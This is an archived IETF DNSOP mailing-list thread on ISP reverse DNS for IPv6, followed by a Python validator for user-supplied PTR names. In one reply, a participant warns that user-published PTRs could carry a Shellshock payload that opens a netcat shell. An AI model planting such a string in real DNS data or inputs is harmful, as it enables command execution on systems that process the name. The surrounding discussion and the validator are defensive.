On Thu, Oct 30, 2014 at 5:26 PM, Lee Howard <l...@asgard.org> wrote:
>
> On 10/23/14 5:17 PM, "Mark Andrews" <ma...@isc.org> wrote:
>
>> In message <d06e91ee.72e46%...@asgard.org>, Lee Howard writes:
>>>
>>> From: Mwendwa Kivuva <kiv...@transworldafrica.com>
>>> Date: Thursday, October 23, 2014 7:23 AM
>>> To: dnsop <dnsop@ietf.org>
>>> Subject: [DNSOP] Draft Reverse DNS in IPv6 for Internet Service Providers
>>>
>>> > Referring to the draft by Lee Howard
>>> > https://tools.ietf.org/html/draft-howard-dnsop-ip6rdns-00
>>> >
>>> > and given the weakness of the Reverse DNS access for security purposes, what
>>> > problem is this draft trying to solve?
>>>
>>> There is a common expectation that ISPs will populate PTR records for their
>>> customers.
>>>
>>> In my opinion, that is an unreasonable expectation, since ISPs do not have
>>> host names for customers, so they usually make up a name. That seems pretty
>>> useless to me. However, I don't think that is a consensus opinion, so it's
>>> not what the draft says.
>>
>> But it is not unreasonable to delegate a zone or to accept DNS UPDATE requests
>> from the host you have just assigned an IP address to over TCP.
>
> Not sure of the antecedent of "you." If "you" are a DHCPv6 server, you
> are not necessarily a DNS server authoritative for the ip6.arpa zone in
> question and capable of accepting DNS updates. Especially if "you" are a
> DHCPv6 server on a home router.
>
> You (Mark Andrews, not the servers) have proposed mechanisms for
> facilitating that communication; that would help.
>
>> zone "ip6.arpa" {
>>     update-policy { grant * tcp-self * ptr; };
>> };
>>
>> reverse=`arpaname ${ip_address}`
>> hostname=`hostname`
>
> And residential hosts only know hostname, not domain name; is
> "myMacBook.local" useful as a PTR?

How about '() { :; }; nc -e /bin/bash localhost 666;' or 'TimeWarnerCableSux.local' or 'bigbank.net'

Allowing users to publish this may end poorly...

W

> I haven't checked with users of PTRs
> to see what they think.
>
> Lee
>
> _______________________________________________
> DNSOP mailing list
> DNSOP@ietf.org
> https://www.ietf.org/mailman/listinfo/dnsop

--
I don't think the execution is relevant when it was obviously a bad idea in the first place. This is like putting rabid weasels in your pants, and later expressing regret at having chosen those particular rabid weasels and that pair of pants. ---maf
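As an added example (not from this thread, and not BIND's own code), here is the kind of check an ISP's update front-end could run before letting a client publish a PTR target for its own address, covering the two concerns raised above: the target must be a syntactically sane hostname (so shell metacharacters and ".local" names are rejected) and it must forward-confirm to the requesting address (so a client cannot label itself with another organisation's domain). `lookup_aaaa` is an assumed resolver hook and the AAAA map is constructed; `ip6_arpaname` reimplements what the `arpaname` tool prints.

```python
import ipaddress
import re

# One DNS label under the RFC 1123 "LDH" rule: 1-63 letters, digits or hyphens,
# with no leading or trailing hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")

# Top labels that never belong in a public PTR target.
_REJECTED_TOP_LABELS = {"local", "localhost", "arpa"}


def ip6_arpaname(address):
    """Return the ip6.arpa owner name for an IPv6 address: the nibble-reversed
    form that BIND's `arpaname` tool prints (reimplemented here, not BIND's code)."""
    nibbles = ipaddress.IPv6Address(address).exploded.replace(":", "")
    return ".".join(reversed(nibbles)) + ".ip6.arpa."


def acceptable_ptr_target(name, requester, lookup_aaaa):
    """Decide whether the client at `requester` may publish `name` as the PTR
    target for its own address. `lookup_aaaa(hostname)` is an assumed resolver
    hook returning the set of IPv6 address strings the name resolves to.
    Returns (accepted, reason)."""
    name = name.rstrip(".")
    labels = name.split(".")
    # Syntax first: anything outside LDH (spaces, braces, semicolons, ...) is out.
    if len(name) > 253 or not all(_LABEL.match(label) for label in labels):
        return False, "not a valid LDH hostname"
    if len(labels) < 2:
        return False, "bare host name without a domain"
    if labels[-1].lower() in _REJECTED_TOP_LABELS:
        return False, "mDNS/link-local or reserved top label"
    # Forward confirmation: the claimed name must resolve back to the requester,
    # so a client cannot label itself with someone else's domain.
    forward = {ipaddress.IPv6Address(a) for a in lookup_aaaa(name)}
    if ipaddress.IPv6Address(requester) not in forward:
        return False, "forward lookup does not confirm the requester"
    return True, "ok"


# Constructed stand-in for the resolver: the AAAA records the checker would look up.
FAKE_AAAA = {
    "host-1.example.net": {"2001:db8::1"},
    "bigbank.net": {"2001:db8:ffff::10"},
}


def demo_lookup(hostname):
    return FAKE_AAAA.get(hostname.lower(), set())
```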